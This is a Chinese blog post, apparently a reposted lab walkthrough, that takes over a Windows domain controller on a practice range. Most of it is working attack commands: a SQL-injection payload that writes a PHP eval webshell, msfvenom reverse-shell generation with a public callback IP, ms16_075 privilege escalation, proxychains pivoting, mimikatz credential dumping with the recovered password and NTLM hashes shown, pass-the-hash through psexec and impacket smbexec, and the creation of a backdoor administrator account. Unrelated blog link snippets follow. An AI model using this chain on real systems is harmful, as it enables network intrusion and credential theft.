msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 微信群二维码失效(二维码过期怎么加入微信群)

    微信群在引流时经常会受到7天有效期和200人入群限制,因为这类二维码通常是一个静态的二维码,如果想要让微信群二维码长久有效的话,那么就需要做一个与之相反的二维码,我们称为“动态二维码”,也就是“活码”。   活码可以自动对过期的群二维码进行更新,不受扫码进群时间和人数限制,且可以对扫码的用户数据进行统计,更方便,也更快捷,在微信群营销引流过程中使用…

    2021-12-23 投稿
  • 张靓颖爱的含义如何去理解和感受

    张爱玲曾说:“爱一个人,会卑微到尘埃里,然后开出一朵花。”看了张靓颖的爱情经历,综妹儿信了这句话。 只是,小三传闻,母亲不理解、甚至撕到全国网友面前,这些隐藏的矛盾注定这段爱情不会长久。不到三年,二人传出分居传闻,更有人爆料说,二人其实根本就没领结婚证。有人说,她就那么恨嫁吗?但在综妹儿看来,不是怕嫁不出去,而是太爱了。 逼婚事件过后,张靓颖的妈妈在网上发文…

    投稿 2023-05-24
  • 亚马逊邮箱注册,亚马逊邮箱注册官网

    《亚马逊邮箱注册全攻略》 一、为什么要进行亚马逊邮箱注册 亚马逊作为全球最大的电子商务平台之一,拥有庞大的用户群体和丰富的商品资源。进行亚马逊邮箱注册,也许能为我们带来许多好处。比如,我们可以通过注册后的账号在亚马逊上购买各种商品,享受便捷的购物体验;也许还能通过卖家账号在平台上销售自己的产品,开启创业之路。就好像我们进入了一个巨大的商场,注册邮箱就像是拿到…

    投稿 2025-10-01
  • 提笔写《素媛》会怎样开始(素媛肚子越来越大是什么意思)

    我想了很多次,提笔写《素媛》会怎样开始,最后决定把整个事件复述一遍。 “在韩国,一名八岁女童遭到了性侵。”这就是这个事件的起因、经过和结果,整个事件的盖棺定论。十四个字,掩住了所有情感。   素媛的痛苦,家人的挣扎,罪犯的邪恶,世界温暖和冷漠的嘴脸,都被藏在这十四个字里,好像救出素媛,送到医院,时间就会停止,她不用再面对世界。 “世界上只有一种英雄…

    2022-01-05
  • 微信注册账号(微信注册账号需要辅助验证怎么办)

    我原以为,申请好个人微信公众号后,只要会写文章就可以了,其实不然,没有那么简单。 通过这段时间的操作,我总结了一下,微信公众号注册前后的操作方法: 第一,注册前先起好“账号名称”,想好简介怎么写,选哪一个公众号类型。 我注册前都不懂这些,1月中旬的一天,半夜睡不着,就躺在床上用手机注册,账号名称随便起一个,就是“海玲生活写意”,各取老公和我名字的一个字,简介…

    投稿 2023-05-24
  • 苏炳添有望获奥运奖牌 ,苏翊鸣参加冬奥会吗

    北京冬奥会尚未结束 中国代表团已经创造历史最好战绩 其中苏翊鸣斩获一金一银 被“亚洲飞人”苏炳添夸为“雪上苏神” 昨夜突然传来消息 作为“苏神”本尊 苏炳添也有望获得一枚奥运奖牌 苏炳添不是参加夏奥会的吗? 这还火线跨界跨项了? 不过即使苏炳添和队友们拿到奖牌 有些遗憾也终归不能完全弥补 这一点巩立姣一定深有体会 作为奥运会“四朝元老” 巩立姣集齐了金、银、…

    2023-06-06
  • 付费杀毒软件排行榜,一个比一个好用

    注:本文只针对于电脑水平一般以及懒得折腾的人,对于付费选手,可考虑使用付费杀毒软件。 很多朋友使用电脑的时候,会下载腾讯管家、360、金山毒霸或者火绒等免费的杀毒软件,这些软件虽然免费,但杀毒能力除了360较强外(当然其也有很多问题,饱受消费者诟病),其余还是比较弱的,当然我说的只是普通的病毒,而不是感染能力很强的病毒。 我推荐使用的免费强力杀毒软件就是微软…

    2022-04-23
  • oppo怎么解除密码锁屏,OPPO手机解除图案密码的步骤

    OPPO手机最主要的特点就是拍照功能,其功能强大,在市场上越来越受年轻人的欢迎,那么你可知道OPPO手机其它的功能呢,既然不知道的话,那么就一起来跟我看看吧。   一、语音拍照 现在不管是大人还是小孩都喜欢拍照,喜欢拍下自己的点点滴滴,记录生活。但是拍照的时候手容易抖,一抖就容易影响效果,别担心,OPPO手机有语音拍照功能,只要你拍照的时候,手机用…

    2022-03-17 投稿
  • 卫星视角俯瞰冬奥闭幕夜(冬奥闭幕)

    据央视新闻报道称,2月20日晚,北京冬奥会闭幕式再次惊艳世界。这组卫星从太空中回传的照片中,夜幕中的北京流光溢彩,灯火璀璨。 2月20日,北京在奥运之火缓缓熄灭后,第24届冬奥会闭幕式结束,为期17天的北京2022年冬奥会随之正式落下帷幕。 闭幕式从空中闪亮的大雪花火炬开始,恰似开幕式结束时定格的那一刻。孩子们手持绚烂的雪花花灯,点亮场地上的“冬”字会徽,寓…

    2023-01-24
  • 抖音的人是如何赚钱的(普通人如何在抖音上赚钱)

    什么样的人算普通人呢? 没有团队,不懂技术,没有资源,不了解行业,信息落后。 这样的人,我理解应该算是一个普通人吧。 其实,在我眼里,这样的普通人,仍然有很多机会赚到钱。 只要你有执行力。 不信? 试试我分享的这个思路,我尽可能描述的具体点。   准备一个微信小号,最好与你常用微信号独立开,免得你后面不好意思;开始刷抖音,但不要看视频,视频内容不重…

    2022-01-10
  • 乐堡绿放音乐节 ,西双版纳理想而神奇的乐土

    2016年西双版纳“乐堡绿放音乐节”全面来袭喽!!! 阴冷与奔放相融的大波浪, 带你进入一场复古新浪潮的精神漫游。 一江两门九塔十二寨遇上音乐节 在贯穿九国的澜沧江边,告庄西双景大金塔前,和乐迷们一同见证“最具民族风情X摩登摇滚”的完美融合!一江通九国,流淌着东南亚最热情的荷尔蒙;九塔冠绝版纳,在最具东南亚风情的广场前,感受置身现代音乐节对比的美感。当音乐节…

    2023-06-04 投稿
  • 在农村养鸭赚钱吗(养鸭成本与收益)

      我国是世界第一养鸭大国,也是第一消费大国。从类型上看,鸭子主要分为肉用型、蛋用型和兼用型三种类型。其中北京鸭、樱桃谷鸭是肉用型的代表,绍兴鸭、金定鸭是蛋用型的代表,高邮鸭、建昌鸭是兼用型的代表。据统计,2018年我国商品肉鸭出栏29.13亿只,2019年出栏42.68亿只。2018年我国鸭蛋产量306.91万吨,2019年产量309.34万吨。…

    2022-01-23